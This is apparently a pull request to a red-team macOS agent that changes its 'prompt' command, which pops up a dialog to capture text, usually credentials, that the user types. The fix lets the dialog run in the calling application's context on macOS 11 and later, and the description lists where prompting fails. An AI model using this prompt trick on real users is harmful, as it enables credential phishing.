### PR TITLE
Prompt workaround for 11.0+

### DIFF
--- a/Payload_Type/apfell/agent_code/prompt.js
+++ b/Payload_Type/apfell/agent_code/prompt.js
@@ -11,7 +11,11 @@ exports.prompt = function(task, command, params){
 	let answer = "";
 	if(config.hasOwnProperty("answer") && config['answer'] !== ""){answer = config['answer'];}
 	try{
-		let prompt = currentApp.displayDialog(text, {
+
+		let contextApp = currentApp.systemAttribute('__CFBundleIdentifier').toString()
+		var newApp = Application(contextApp)
+		newApp.includeStandardAdditions = true;
+		let prompt = contextApp.displayDialog(text, {
 			defaultAnswer: answer,
 			buttons: ['OK', 'Cancel'], 
 			defaultButton: 'OK',

--- a/Payload_Type/apfell/agent_code/prompt.js
+++ b/Payload_Type/apfell/agent_code/prompt.js
@@ -12,9 +12,9 @@ exports.prompt = function(task, command, params){
 	if(config.hasOwnProperty("answer") && config['answer'] !== ""){answer = config['answer'];}
 	try{
 
-		let contextApp = currentApp.systemAttribute('__CFBundleIdentifier').toString()
-		var newApp = Application(contextApp)
-		newApp.includeStandardAdditions = true;
+		let cbID = currentApp.systemAttribute('__CFBundleIdentifier').toString()
+		let contextApp = Application(cbID)
+		contextApp.includeStandardAdditions = true;
 		let prompt = contextApp.displayDialog(text, {
 			defaultAnswer: answer,
 			buttons: ['OK', 'Cancel'], 

--- a/documentation-payload/apfell/commands/prompt.md
+++ b/documentation-payload/apfell/commands/prompt.md
@@ -58,6 +58,9 @@ prompt
 
 Uses JXA to issue a prompt to the user and returns the information they supply:
 ```JavaScript
+let cbID = currentApp.systemAttribute('__CFBundleIdentifier').toString()
+let contextApp = Application(cbID)
+contextApp.includeStandardAdditions = true;
 let prompt = currentApp.displayDialog(text, {
 			defaultAnswer: answer,
 			buttons: ['OK', 'Cancel'], 


### PR DESCRIPTION
Leveraging Cedric Owens' context method to call the application's context rather than current application for prompting. No longer hangs agent but limited in other situations. Can't prompt in: root processes, launch agents, installer child processes.